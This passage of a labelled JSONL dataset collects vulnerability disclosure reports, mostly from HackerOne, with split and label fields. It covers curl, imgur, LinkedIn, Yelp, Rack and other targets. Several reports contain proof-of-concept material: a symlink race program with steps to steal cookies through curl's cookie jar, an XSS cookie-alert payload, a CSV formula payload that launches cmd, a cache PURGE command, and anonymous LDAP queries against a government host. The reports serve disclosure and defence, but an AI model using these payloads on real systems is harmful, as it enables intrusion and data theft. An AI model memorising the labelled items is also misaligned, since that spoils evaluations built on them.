(Curl_fopen) is also used for storing cookies an attacker could trick another user to send those cookies that might be very sensible to a file fully owned and controlled by the attacker.\n\n###POC/Steps to reproduce:\nBefore we start, I will be using a little program called \"rename\". Which simply swaps atomically the names of two files to be able to showcase this race condition. Here is its code :\n```\n#include \n#include \n#include \n#include \n#include \n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n\n// source https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c\nint main(int argc, char *argv[]) {\n while (1) {\n syscall(SYS_renameat2, AT_FDCWD, argv[1], AT_FDCWD, argv[2], RENAME_EXCHANGE);\n }\n return 0;\n}\n```\n\nOpen two terminals, with two different users. One will be the attacker terminal and the other the victim. \nIn both POCs, the victim will want to execute a command such as \"curl --cookie-jar a google.com\" thinking the file \"a\" doesn't exist.\n\n###A) Exploiting this vulnerability to trick a user to overwrite a file they own:\n\nAssume the current directory of both attacker(selmelc) and victim (root) looks like this\n```SHELL\nlrwxrwxrwx 1 selmelc selmelc 4 Jun 27 07:11 a -> flag\ndrwxrwxrwx 2 selmelc selmelc 4096 Jun 27 07:11 b\n-rw-r--r-- 1 root root 6 Jun 27 07:05 flag\n-rwxr-x--- 1 selmelc selmelc 16608 Jun 27 07:04 rename\n```\nThe attacker executes ./rename a b, which will not stop to swap the name of the directory \"b\" and the symlink \"a\". \n\nThe victim executes their command \"curl --cookie-jar a google.com\".\nThe race condition is successfully exploited if in the vulnerable code the stat identifies the file \"a\" as a directory and then the \"fopen\" opens the symlink that points to the file \"flag\".\nIf that happened then the results looks like this :\n```\n...\n-rw-r--r-- 1 root root 131 Jun 27 07:13 flag\n...\nroot@deb:/home/selmelc/Documents# cat flag\n# Netscape HTTP Cookie File\n# https://curl.se/docs/http-cookies.html\n# This file was generated by libcurl! Edit at your own risk.\n```\nAdditional note: \nYou might think \"well that's just how symlinks work\"... To clarify on that, by default if the victim was executing \"curl --cookie-jar a google.com\" without the attacker exploiting the vuln. a different behavior would occur ; the file \"a\" would be erased (no more symlink) and overwritten as a regular file containing the cookie data. This happens because the stat function follows symbolic links therefore in that scenario we would not enter the vulnerable condition which leads to the race condition.\n\n###B) Exploiting this vulnerability to steal the victim's cookies and hide it from them:\n\nAs this uses the same logic as the previous exploit for this vuln. Repeat same steps except this time we want the \"flag\" file to be owned by the attacker as following:\n```\nlrwxrwxrwx 1 selmelc selmelc 4 Jun 27 08:42 a -> flag\ndrwxrwxrwx 2 selmelc selmelc 4096 Jun 27 08:41 b\n-rw--w--w- 1 selmelc selmelc 0 Jun 27 08:41 flag\n-rwxr-x--- 1 selmelc selmelc 16608 Jun 27 07:04 rename\n\n```\nNormal curl behavior after the victim executed \"curl --cookie-ja", "source": "hackerone", "timestamp": "2023-07-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "75e775e6733222635db1", "text": "OpenBMCS 2.4 Secrets Disclosure\n\nSeverity: high", "source": "zeroscience", "timestamp": "2022-01-16", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "a620b82eb3ec28a80895", "text": "MiniDVBLinux 5.4 Arbitrary File Read Vulnerability\n\nSeverity: critical", "source": "zeroscience", "timestamp": "2022-10-16", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "72b07edc85a0a2f74c60", "text": "[Unknown] Yet another SSRF query for Go\n\nThis bug was reported directly to GitHub Security Lab.", "source": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "f053e41150d0d5855f1c", "text": "[Uncontrolled Resource Consumption] [CVE-2022-44572] Possible Denial of Service Vulnerability in Rack’s RFC2183 boundary parsing\n\nI reported at https://hackerone.com/reports/1639882\n\nhttps://discuss.rubyonrails.org/t/cve-2022-44572-possible-denial-of-service-vulnerability-in-racks-rfc2183-boundary-parsing/82124\n> There is a denial of service vulnerability in the multipart parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2022-44572.\n> Carefully crafted input can cause RFC2183 multipart boundary parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. Any applications that parse multipart posts using Rack (virtually all Rails applications) are impacted.\n\n## Impact\n\nAny applications that parse multipart posts using Rack (virtually all Rails applications) are impacted.\nThis regular expression does not have the effect of ReDoS countermeasures using memoization in Ruby 3.2.", "source": "hackerone", "timestamp": "2023-07-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "df8a9eb21688121a030e", "text": "[Client-Side Enforcement of Server-Side Security] Information disclosure by sending a GIF\n\n# Summary\n- The attacker can view the Operating System, Version Of The Operating System, Browser, IP Address, Device ID, Phone Model, Time Zone and other critical information about any LinkedIn user they have identified as a victim.\n\n# Steps to Reproduce\n\n1- Create a standard linkedin user account to use in the attack.\n2- Select a GIF from the GIF Keyboard and capture the request with Burp Suite while sending it to your victim.\n3- Forward all requests until you get to the voyager/api/voyagerMessagingDashMessengerMessages?action=createMessage endpoint. In this request, type the Burp Suite Collaborator url in message.renderContentUnions.externalMedia.media.url in the JSON Data containing (parameters) section.\n4- When the victim opens the message box, the attacker will get critical information about the victim.\n\n** Steps Photo **\n\n{F2073194}\n{F2073195}\n{F2073196}\n{F2073197}\n{F2073200}\n{F2073201}\n{F2073202}\n\n## Notes ##\n\n- This vulnerability affects not only smartphones but all platforms where you can use the link (Smart Phones, iPads, Web Browser, Smart TV etc.)\n- When the victim uses an apple phone, much more and critical data can be obtained than the android and web version.\n\n{F2073291}\n--------\n{F2073293}\n\n## PoC Video\n{F2073296}\n{F2073297}\n\n## References\n- Same Attack Scenarios\n\nhttps://ph-hitachi.medium.com/facebook-bug-poc-external-service-interaction-dns-http-ab55bfdb98f6\n\n## Impact\n\nBlack Hat Hackers can get critical information about all LinkedIn users. The information obtained is very important for the privacy of the users and includes information such as IP address, OS versions.", "source": "hackerone", "timestamp": "2023-04-28", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "e71748050a720ef3be73", "text": "[Misconfiguration] Exposed Cortex API at https://cortex-ingest.shopifycloud.com/\n\nHi there, to be honest this is the first time I have seen this type of asset, but I think it is interesting/not supposed to be exposed. There is a Cortex metrics server running without authentication on https://cortex-ingest.shopifycloud.com/. This allows us to see the config for the server, call various Cortex APIs, and also exposes a Golang pprof debugger where we can see all the command-line arguments and DoS the server.\n\nExample URLs:\n* Cortex home: https://cortex-ingest.shopifycloud.com/\n* Cortex config: https://cortex-ingest.shopifycloud.com/config\n* Golang pprof home: https://cortex-ingest.shopifycloud.com/debug/pprof/\n* Golang pprof cmdline: https://cortex-ingest.shopifycloud.com/debug/pprof/cmdline?debug=1\n\nI see that the Cortex API offers many endpoints, some of which work and some of which do not: https://cortexmetrics.io/docs/api/#endpoints. I will take a look and see what impact I can find there.\n\n## Impact\n\nInformation disclosure, no authentication", "source": "hackerone", "timestamp": "2022-12-02", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "2815e3862b7fb4f3b53a", "text": "[Improper Authentication - Generic] PURGE is not authenticated\n\nHi @yelp Team,\n\nAnyone can issue a PURGE request for any resource and invalidate your caches. That can lead to increased bandwidth costs.\n\nFetching the resource headers, we can see in the `X-Cache-Hits: 1, 14` :\n```\nE:\\>curl https://s3-media0.fl.yelpcdn.com/assets/public/pride@2x.yelp_design_web.yji-629fce3629585b9db2137d9353196628.png --head\nHTTP/1.1 200 OK\nETag: \"629fce3629585b9db2137d9353196628\"\nx-amz-version-id: KnfcY6QenKubeC6DBXpUT1d87B17ORdD\nContent-Type: image/png\nServer: AmazonS3\nVia: 1.1 varnish\nAccess-Control-Allow-Origin: *\nContent-Length: 17079\nAccept-Ranges: bytes\nDate: Wed, 26 Jun 2019 01:22:10 GMT\nVia: 1.1 varnish\nConnection: keep-alive\nX-Served-By: cache-sjc3141-SJC, cache-hkg17922-HKG\nX-Cache: HIT, HIT\nX-Cache-Hits: 1, 14\nX-Timer: S1561512131.889727,VS0,VE0\nCache-Control: max-age=315360000, immutable\nTiming-Allow-Origin: *\nX-Content-Type-Options: nosniff\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\n```\n\nUnauthenticated purge request:\n```\nE:\\>curl https://s3-media0.fl.yelpcdn.com/assets/public/pride@2x.yelp_design_web.yji-629fce3629585b9db2137d9353196628.png --head -XPURGE\nHTTP/1.1 200 OK\nContent-Type: application/json\nContent-Length: 46\nAccept-Ranges: bytes\nDate: Wed, 26 Jun 2019 01:22:17 GMT\nX-Varnish: 1668603163\nVia: 1.1 varnish\nConnection: keep-alive\nX-Served-By: cache-hkg17923-HKG\n```\n\nHeader `X-Cache-Hits: 1, 0`:\n```\nE:\\>curl https://s3-media0.fl.yelpcdn.com/assets/public/pride@2x.yelp_design_web.yji-629fce3629585b9db2137d9353196628.png --head\nHTTP/1.1 200 OK\nETag: \"629fce3629585b9db2137d9353196628\"\nx-amz-version-id: 8qpzJuX00EuyeMTUm5QGEHehZ2rbfRmQ\nContent-Type: image/png\nServer: AmazonS3\nVia: 1.1 varnish\nAccess-Control-Allow-Origin: *\nContent-Length: 17079\nAccept-Ranges: bytes\nDate: Wed, 26 Jun 2019 01:22:20 GMT\nVia: 1.1 varnish\nConnection: keep-alive\nX-Served-By: cache-sjc3129-SJC, cache-hkg17923-HKG\nX-Cache: HIT, MISS\nX-Cache-Hits: 1, 0\nX-Timer: S1561512140.209567,VS0,VE151\nCache-Control: max-age=315360000, immutable\nTiming-Allow-Origin: *\nX-Content-Type-Options: nosniff\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\n```\n\n## Impact\n\nThat can lead to increased bandwidth costs.", "source": "hackerone", "timestamp": "2023-01-19", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "cf963b04028bf00023d8", "text": "[Out-of-bounds Read] CVE-2022-35260: .netrc parser out-of-bounds access\n\n## Summary:\nCurl expects the .netrc file to have space characters. So if there is no space character, it will do an out-of-bounds read and a 1-byte out-of-bounds write.\nThis can happen multiple times depending on the state of the memory.\n\n## Steps To Reproduce:\n\n `curl --netrc-file .netrc test.local`\n\".netrc\" is attached.\nThe content is 'a' for 4095 bytes.\nDepending on memory conditions, even single-byte files can cause problems.\n\nIt's not exactly just spaces and newlines.\nThe condition is that the .netrc file does not contain characters for which ISSPACE() returns true (so it is also a condition that there is no line feed code).\nThere is a problem with parsenetrc() in lib/netrc.c.\nparsenetrc() has the following loop.\n```\n while(!done && fgets(netrcbuffer, netrcbuffsize, file)) {\n char *tok;\n char *tok_end;\n bool quoted;\n if(state == MACDEF) {\n if((netrcbuffer[0] == '\\n') || (netrcbuffer[0] == '\\r'))\n state = NOTHING;\n else\n continue;\n }\n tok = netrcbuffer;\n while(tok) {\n while(ISSPACE(*tok))\n tok++;\n /* tok is first non-space letter */\n if(!*tok || (*tok == '#'))\n /* end of line or the rest is a comment */\n break;\n\n /* leading double-quote means quoted string */\n quoted = (*tok == '\\\"');\n\n tok_end = tok;\n if(!quoted) {\n while(!ISSPACE(*tok_end))\n tok_end++;\n *tok_end = 0;\n }\n```\nThe 'a' and the terminating character '\\0' in the .netrc file are characters for which ISSPACE() returns false, so while on line 25 is true(!false).\nThis causes an out-of-bounds read.\nAlso, line 27 is an out-of-bounds write. (1 byte for '\\0).\n\n## Remediation ideas:\nI think it would be better to include the condition that *tok is not NULL in the while statement.\n\n## Impact\n\nApplication crash plus other as yet undetermined consequences.", "source": "hackerone", "timestamp": "2022-10-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "feb789bb4fa5c4068bb5", "text": "[Information Disclosure] LDAP Anonymous Login enabled in ████\n\n**Description:**\nThe host ██████████ has anonymous LDAP login enabled, which means that anyone can connect to the LDAP server without providing any authentication credentials. This allows unauthorized users to perform LDAP queries, potentially retrieving sensitive information such as user details, organizational data, or other critical information stored in the LDAP directory.\n\n## References\nhttps://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap\n\n## Impact\n\nAttackers can exploit this vulnerability to gain unauthorized access to the LDAP server and retrieve sensitive information stored within the directory. Attackers can use the gathered information to perform further attacks, including privilege escalation, or targeted attacks against the system or its users.\n\n## System Host(s)\n████\n\n## Affected Product(s) and Version(s)\nLADP\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n## Proof Hosts Belong to DoD\n\n██████\n\n1. First install ldap3 using pip3 and run the following command.\n\n```\nPython 3.9.2 (default, Feb 28 2021, 17:03:44) \n[GCC 10.2.1 20210110] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import ldap3==\n>>> server = ldap3.Server('██████████', get_info = ldap3.ALL, port =636, use_ssl = True)\n>>> connection = ldap3.Connection(server)\n>>> connection.bind()\nTrue\n>>> server.info\nDSA info (from DSE):\n Supported LDAP versions: 2, 3\n Naming contexts: \n dc=satx,dc=disa,dc=mil\n uid=Monitor\n cn=iasdsadmin\n Supported controls: \n 1.2.826.0.1.3344810.2.3 - Matched Values - Control - RFC3876\n 1.2.840.113556.1.4.1413 - Permissive modify - Control - MICROSOFT\n 1.2.840.113556.1.4.319 - LDAP Simple Paged Results - Control - RFC2696\n 1.2.840.113556.1.4.473 - Sort Request - Control - RFC2891\n 1.2.840.113556.1.4.805 - Tree delete - Control - MICROSOFT\n 1.3.6.1.1.12 - Assertion - Control - RFC4528\n 1.3.6.1.1.13.1 - LDAP Pre-read - Control - RFC4527\n 1.3.6.1.1.13.2 - LDAP Post-read - Control - RFC4527\n 1.3.6.1.4.1.26027.1.5.2 - Replication repair - Control - OpenDS\n 1.3.6.1.4.1.26027.1.5.4\n 1.3.6.1.4.1.36733.2.1.5.1\n 1.3.6.1.4.1.36733.2.1.5.5\n 1.3.6.1.4.1.42.2.27.8.5.1 - Password policy - Control - IETF DRAFT behera-ldap-password-policy\n 1.3.6.1.4.1.42.2.27.9.5.2 - Get effective rights - Control - IETF DRAFT draft-ietf-ldapext-acl-model\n 1.3.6.1.4.1.42.2.27.9.5.8 - Account usability - Control - SUN microsystems\n 1.3.6.1.4.1.4203.1.10.1 - Subentries - Control - RFC3672\n 1.3.6.1.4.1.4203.1.10.2 - No-Operation - Control - IETF DRAFT draft-zeilenga-ldap-noop\n 1.3.6.1.4.1.4203.666.5.12\n 1.3.6.1.4.1.7628.5.101.1 - LDAP subentries - Control - IETF DRAFT draft-ietf-ldup-subentry\n 2.16.840.1.113730.3.4.12 - Proxied Authorization (old) - Control - Netscape\n 2.16.840.1.113730.3.4.16 - Authorization Identity Request Control - Control - RFC3829\n 2.16.840.1.113730.3.4.17 - Real attribute only request - Control - Netscape\n 2.16.840.1.113730.3.4.18 - Proxy Authorization Control - Control - RFC6171\n 2.16.840.1.113730.3.4.19 - Chaining loop detection - Control - Netscape\n 2.16.840.1.113730.3.4.2 - ManageDsaIT - Control - RFC3296\n 2.16.840.1.113730.3.4.3 - Persistent Search - Control - IETF\n 2.16.840.1.113730.3.4.4 - Netscape Password Expired - Control - Netscape\n 2.16.840.1.113730.3.4.5 - Netscape Password Expiring - Control - Netscape\n 2.16.840.1.113730.3.4.9 - Virtual List View Request - Control - IETF\n Supported extensions: \n 1.3.6.1.1.8 - Cancel Operation - Extension - RFC3909\n 1.3.6.1.4.1.1466.20037 - StartTLS - Extension - RFC4511-RFC4513\n 1.3.6.1.4.1.26027.1.6.1 - Password policy state - Control - OpenDS\n 1.3.6.1.4.1.26027.1.6.2 - Get connection ID - Control - OpenDS\n 1.3.6.1.4.1.26027.1.6.3 - Get symmetric key - Control - OpenDS\n 1.3.6.1.4.1.4203.1.11.1 - Modify Password - Extension - RFC3062\n 1.3.6.1.4.1.4203.1.11.3 - Who am I - Extension - RFC4532\n Supported features: \n 1.3.6.1.1.14 - Modify-Increment - Feature - RFC45", "source": "hackerone", "timestamp": "2023-09-08", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "cc41e146acbe14e620c5", "text": "[Cross-site Scripting (XSS) - Stored] HTML injection in search UI when selecting a circle with HTML in the display name\n\nHTML injection is a web security issue where attackers insert harmful code into a web application, affecting how it appears and functions. This can lead to data theft, phishing, malware distribution, and session hijacking, posing significant risks to users and the application's integrity. Prevention involves thoroughly checking and encoding user-generated content to ensure it's safe for rendering in web pages.\n\nReproduction Steps: \n\n1. Log in to the application using a low-privilege user account.\n2. Access the \"Contacts\" section and initiate the creation of a new Circle.\n3. When naming the Circle, insert the following payload: ````.\n4. Share the Circle with a user account having an \"Admin\" role.\n5. Switch to the \"Admin\" user role and go to \"Files\" > \"Shared with Circles.\"\n6. Observe that the browser will redirect to a malicious website within a 2-second timeframe.\n\nVideo POC : \n{F2775888}\n\n## Impact\n\nHTML injection can have significant impacts, including:\n\nData theft\nPhishing attacks\nMalware distribution\nSession hijacking\nThese consequences can harm both users and the application's security.", "source": "hackerone", "timestamp": "2023-11-21", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "76a49c18e8959fe45119", "text": "[Insecure Direct Object Reference (IDOR)] IDOR vulnerability in unreleased HackerOne Copilot feature\n\n**Summary:**\nHello HackerOne security team :-)\nFor a while now I have been monitoring H1 js files. I've just noticed some new GraphQL queries about `HackerOne Copilot`. While this feature has not yet been released, the vulnerability must be fixed.\n`DestroyLlmConversation` GraphQL mutation is vulnerable to IDOR.\n\n### Steps To Reproduce\n1. Navigate to `https://hackerone.com/opportunities/all`\n2. Execute this JS command to show `Hackerone Copilot` GUI\n```javascript\ndocument.querySelectorAll('div').forEach(e => {\n e.classList.remove('hidden');\n e.classList.remove('dark:text-white');\n});\n```\n{F2790650}\n3. Hackerone Copilot GUI will appear, here you can create a new conversation. Looks like you can't talk to LLM at the moment.\n4. After creating a new conversation, look for `\"operationName\":\"NewConversation\",` graphql request in your `Proxy History` and store somewhere the value of `data.newConversation.llm_conversation.id` from the response.\n5. From the second (attacker) account, send the following graphql request:\n```json\n{\"operationName\":\"DestroyLlmConversation\",\"variables\":{\"llmConversationId\":\"#\"},\"query\":\"\\n mutation DestroyLlmConversation($llmConversationId: ID!) {\\n destroyConversation(input: { llm_conversation_id: $llmConversationId }) {\\n destroyed\\n }\\n }\\n\"}\n```\n6. Go back to the victim account, refresh the page, execute the script again, and notice that the conversation is gone.\n\n## Impact\n\nThis vulnerability allows the attacker to remove any LLM conversation in the unreleased `HackerOne Copilot` feature. This feature has not been released yet although this might still be vulnerable in the future when this feature is released.", "source": "hackerone", "timestamp": "2023-10-25", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "898e3d3e0ba6a0facca8", "text": "[Cross-site Scripting (XSS) - Reflected] xss reflected on imgur.com\n\nSteps to reproduce : \n- i log in to my account and navigate to see other profile\n- i intercept the request then click Give Emerald\n\n{F1115658}\n\nRequest look like : \n```\nPOST /account/v1/gifting/purchase?client_id=546c25a59c58ad7 HTTP/1.1\nHost: api.imgur.com\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0\nAccept: application/json\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://imgur.com/user/hermawanferdi\nContent-Type: application/json\nOrigin: https://imgur.com\nContent-Length: 311\nConnection: close\nCookie: postpagebeta=1; amplitude_id_f1fc2abcb6d136bd4ef338e7fc0b9d05imgur.com=eyJkZXZpY2VJZCI6ImM5YzdiYTIxLTAzMjgtNGJkZi05ZGQ2LTE4NDFmZTY2ZGI3Y1IiLCJ1c2VySWQiOiIxMTI1OTYxMzUiLCJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOjE2MDc5MjQxNTE0MDcsImxhc3RFdmVudFRpbWUiOjE2MDc5MjQ5NzA1ODQsImV2ZW50SWQiOjIwLCJpZGVudGlmeUlkIjozNiwic2VxdWVuY2VOdW1iZXIiOjU2fQ==; is_emerald=0; __qca=P0-164562980-1607924155407; is_authed=1; IMGURSESSION=6bc49554ae5b60f78f6928698819d0aa; SESSIONDATA=%7B%22sessionCount%22%3A1%2C%22sessionTime%22%3A1607924534647%7D; IMGURUIDJAFO=98a32f615768bd72bcfd89f450ea3f8c7a8b83db9647ade587ead48ace80048a; G_ENABLED_IDPS=google; authautologin=b63b9adee68e2e6ff10c0524995762d1%7EhtH5HkdxlstYng81Zq26XEEq7fv7IRra; accesstoken=095cd3db32693c0127c479dfda1fd563c776bdcd; _nc=1; postpagebetalogged=1; frontpagebetav2=1; pp=4807269994624293; fpb-roll=28.099570399611384; __asc=5812397c1765fc71d7f51cf98df; __auc=5812397c1765fc71d7f51cf98df; _ga=GA1.2.509004379.1607924653; _gid=GA1.2.206575419.1607924653; _fbp=fb.1.1607924654910.554323515\n\n{\"gifter_id\":112596135,\"recipient_id\":136516779,\"amount\":1,\"redirect_url\":\"https://imgur.com/emerald/give-emerald?username=hermawanferdi&redirect=https://imgur.com/user/hermawanferdi\",\"source\":\"User profiler\",\"source_url\":\"https://imgur.com/user/hermawanferdi\",\"anonymous\":true,\"post_id\":null,\"comment_id\":null}\n```\n\n- i notice \"redirect_url\":\"https://imgur.com/emerald/give-emerald?username=hermawanferdi&redirect=https://imgur.com/user/hermawanferdi\"\n- i copy the url and change the redirect parameter\n- i change the redirect parameter with payload xss \"javascript:alert(document.cookie)\"\n- i open the url on browser\n- xss alert\n\n{F1115659}\n\n## Impact\n\nreflected xss / xss attack", "source": "hackerone", "timestamp": "2022-01-22", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "a180faec44128783128d", "text": "[Information Disclosure] CVE-2022-27775: Bad local IPv6 connection reuse\n\n## Summary:\ncurl/libcurl doesn't consider IPv6 address zone index when doing connection reuse. if connection exists to specific IPv6 address (and other conditions for connection reuse are fulfilled) it will be reused for connections regardless of the zone index.\n\n## Steps To Reproduce:\n\n 1. Set up a fake server: `echo -ne 'HTTP/1.1 200 OK\\r\\nContent-Length: 6\\r\\n\\r\\nHello\\n' | nc -6 -v -l -p 9999`\n 2. curl \"http://[ipv6addr]:9999/x\" \"http://[ipv6addr%25lo]:9999/y\"\n\nBoth connections arrive to the test server:\n\n```\nListening on :: 9999\nConnection received on somehost someport\nGET /x HTTP/1.1\nHost: [ipv6addr]:9999\nUser-Agent: curl/7.83.0-DEV\nAccept: */*\n\nGET /y HTTP/1.1\nHost: [ipv6addr]:9999\nUser-Agent: curl/7.83.0-DEV\nAccept: */*\n```\n\nClearly the 2nd connection should fail as the address is not available at interface lo. (Lone connection to `http://[ipv6addr%25lo]:9999/` fails with `curl: (7) Couldn't connect to server`)\n\nThis vulnerability isn't exploitable with public IPv6 addresses on linux systems (it seems kernel strips out zone index for public addresses). It is exploitable with macOS however, and possibly other non-linux OSes.\n\n## Impact\n\nReuse of wrong connection leading to potential disclosure of confidential information.", "source": "hackerone", "timestamp": "2022-04-29", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "883dc36734051c8a3063", "text": "OpenBMCS 2.4 Create Admin / Remote Privilege Escalation\n\nSeverity: high", "source": "zeroscience", "timestamp": "2022-01-16", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "975350be2f963fe04c23", "text": "[Cross-Site Request Forgery (CSRF)] CSRF to delete accounts [HtUS]\n\nHello,\nI Have an endpoint in ██████████that's vulerable to CSRF which lead to delete a victim's account\n\nSteps to reproduce:\n1. Nevgaite to ███Create an account\n2. Click on your profile\n3. You will see DELETE ACCOUNT button\n4. Click on it and type YES in the input\n5. Make sure your burpsuite is on and click delete account button\n\n```\nPOST /users/deleteAccount HTTP/1.1\nHost: ██████\nCookie: _ga=GA1.2.984523169.1657131465; _gid=GA1.2.2029769492.1657131465; session=eyJwYXNzcG9ydCI6eyJ1c2VyIjoibmlnaHRtNHJlQHdlYXJlaGFja2Vyb25lLmNvbSJ9fQ==; session.sig=S8rkHNPfoRIIU66VUCbDCaV_Kb4; _ga_FCSTM1E00P=GS1.1.1657145372.2.1.1657145650.0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nOrigin: https://███████\nReferer: https://█████/users/deleteAccount\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nContent-Length: 0\nTe: trailers\nConnection: close\n```\n\n6. Capture the request and click right > Engagement Tools > Generate CSRF POC\n\n```\n\n \n \n \n

    \n \n
    \n \n\n```\n\n7. Copy the HTML Code and put to your server and send the page to the victim\n8. Once the vicitm opnening the page his account will be deleted\n\n## Impact\n\nAn attacker can delete vicitm's account", "source": "hackerone", "timestamp": "2023-05-15", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "3c38ec5c8e428872061e", "text": "[Improper Access Control - Generic] After the upload of an private file, using transformations, the file becomes public without the possibility of changing it.\n\n## Summary:\nWhen an user uploads a private file, ex (Screenshot 1), where only he has access to. Using the \"View transformations\" function can generate different kinds of image transformations (Screenshot 2). But after the generation of that transformation for example clicking on the regenerate button next to profile. The function will create a cropped public image, where the user is unable to edit or modify his own generated image (Screenshot 3). \n\nIssue: You have a picture with you smiling and your passport holding in your hand (An example would be a \"know you customer purpose\" selfie). You like that picture on how you look, so you upload it on phabricator, privately, assuming nobody can view it. You click on view transformations, to modify and crop that picture, to get rid of the sensitive data passport you are holding in your hand, so only the face remains. After you clicked on the regenerate next to profile, you realize the crop doesn't work as intended and your passport data is still in there. So you want to modify/delete that picture but you cant. And what's worse that picture visible to anyone and you don't have access to remove it nor to modify it.\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1.Upload a private picture here: https://phabricator.allizom.org/file/upload/\n 2.Change the visibility to no one or just you.\n 3. After the upload, click on \"View Transformations\" on the right.\n 4. There you can create different transformations when you click on regenerate.\n 5. After that you, you get a new preview to your generated picture. \n 6. Now go back, to the transforms page, and you get a new link on phabricator, that is public, and can't be changed.\n\nI've added a video that showcases this behavior. \n\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\nI've added screenshots and a video to showcase this issue.\n * [attachment / reference]\n\n## Impact\n\nThe user is assuming that he can upload private data securely. Not knowing that the transform feature will make his uploaded files public with no way to delete it, could in worst case leak PII information.", "source": "hackerone", "timestamp": "2023-10-20", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "95a931ccfcc6dcbbf02f", "text": "[Cross-site Scripting (XSS) - Reflected] XSS on ( █████████.gov ) Via URL path\n\nHi team,\nI was able to execute XSS on ███████.gov \n\nSteps to produce - \n1 -Turn on the burp intercepter \n2- Go to https://██████.gov/xapi/statements?file\">\n3- In Intercepter add the following Headers \n\n Authorization: Basic eGFwaS10b29sczp4YXBpLXRvb2xz\n X-Experience-Api-Version: 1.0.1\n\n4- when you send this GET request you will receive a response with XSS payload executed.\n\n## Impact\n\nAn attacker can send the malicious link to victims and steals victims' cookie leading to account takeover.\n\n## System Host(s)\nwww.███.gov\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-41878\n\n## Steps to Reproduce\nI have attached the Video POC, please check it out.\n\n## Suggested Mitigation/Remediation Actions\nsanitize the inputs in the URL", "source": "hackerone", "timestamp": "2023-01-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "a94d1e88921f3a4e87cb", "text": "[Command Injection - Generic] CSV Injection at https://assets-paris-demo.codefi.network/\n\n## Summary:\nHi consensys Security Team.\n\nI have found CSV Injection when generate report at https://assets-paris-demo.codefi.network/\n\nCSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.\nWhen a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with = will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:\n\n - Hijacking the user’s computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014-3524.\n - Hijacking the user’s computer by exploiting the user’s tendency to ignore security warnings in spreadsheets that they downloaded from their own website.\n - Exfiltrating contents from the spreadsheet, or other open spreadsheets.\n\n\n## Steps To Reproduce:\n1. Create an account at https://assets-paris-demo.codefi.network/ \n2. Go to Client management\n3. Create new client \n4. At Client name* Put this paylaod:- `=cmd|' /C notepad'!'A1'`\n5. After create new client Download the data.\n\n## Supporting Material/References:\n\n{F2002581}\n\n##Similar valid reports at hackerone:-\n - https://hackerone.com/reports/118582\n - https://hackerone.com/reports/223344\n - https://hackerone.com/reports/386116\n\nPlease let me know if need more info.\nBest Regards.\n@doosec101\n\n## Impact\n\nThis vulnerability can be harm for normal user because if malicious user injected any malicious script in token note and when customer user download CSV file then inserted command directly runs when CSV file open.\n\n##FIX:-\n Prefix =, +, - and @ symbols with a ' in issues when exporting them to a .csv file.", "source": "hackerone", "timestamp": "2023-01-04", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "77576f8b7b6a502bdc4b", "text": "[Improper Authentication - Generic] OAUTH2 bearer not-checked for connection re-use\n\nlibcurl might reuse OAUTH2-authenticated connections without properly making\nsure that the connection was authenticated with the same credentials as set\nfor this transfer. This affects SASL-enabled protcols: SMTP(S), IMAP(S),\nPOP3(S) and LDAP(S) (openldap only).\n\nlibcurl maintains a pool of connections after a transfer has completed. The\npool of connections is then gone through when a new transfer is requested and\nif there's a live connection available that can be reused, it is preferred\ninstead of creating a new one.\n\nA connection that is successfully created and authenticated with a user name +\nOAUTH2 bearer could subsequently be reused even for user + [other OAUTH2\nbearer], even though that might not even be a valid bearer. This could lead to\nan authenticion bypass, either by mistake or by a malicious actor.\n\nThe problem can be demontrated using an imap server supporting OAUTH2 authentication using command:\n\n`curl 'imap://server:port/path/;MAILINDEX=1' --login-options 'AUTH=OAUTHBEARER' -u user: --oauth2-bearer validbearer --next 'imap://server:port/path/;MAILINDEX=1' --login-options 'AUTH=OAUTHBEARER' -u user: 